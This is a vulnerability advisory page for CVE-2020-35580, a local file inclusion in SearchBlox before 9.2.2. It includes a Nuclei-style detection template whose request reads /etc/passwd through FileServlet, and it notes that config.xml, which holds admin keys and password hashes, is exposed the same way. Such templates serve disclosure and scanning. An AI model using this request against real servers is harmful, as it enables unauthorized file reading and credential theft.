CVE-2020-35580: SearchBlox <9.2.2 - Local File Inclusion

2025-08-01 SearchBlox PoC Public

Description

SearchBlox prior to version 9.2.2 is susceptible to local file inclusion in FileServlet that allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users.

PoC

id: CVE-2020-35580

info:
  name: SearchBlox <9.2.2 - Local File Inclusion
  author: daffainfo
  severity: high
  description: SearchBlox prior to version 9.2.2 is susceptible to local file inclusion in  FileServlet that allows remote, unauthenticated users to read arbitrary files from the operating system via a /searchblox/servlet/FileServlet?col=url= request. Additionally, this may be used to read the contents of the SearchBlox configuration file (e.g., searchblox/WEB-INF/config.xml), which contains both the Super Admin API key and the base64 encoded SHA1 password hashes of other SearchBlox users.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
  remediation: |
    Upgrade to SearchBlox version 9.2.2 or later to mitigate the vulnerability.
  reference:
    - https://hateshape.github.io/general/2021/05/11/CVE-2020-35580.html
    - https://developer.searchblox.com/docs/getting-started-with-searchblox
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35580
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-35580
    cwe-id: CWE-22
    epss-score: 0.13975
    epss-percentile: 0.96354
    cpe: cpe:2.3:a:searchblox:searchblox:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: searchblox
    product: searchblox
  tags: cve2020,cve,lfi,searchblox,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/searchblox/servlet/FileServlet?col=9&url=/etc/passwd"

    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 490a0046304402205cd9fb98fd87faaf06caf2c99898f34bb7af94c9a3d570310154ba395e3d399002200742ab62923b540caa295c1aab4b9aee83cb2e44e74f46abb76805c1856e2217:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities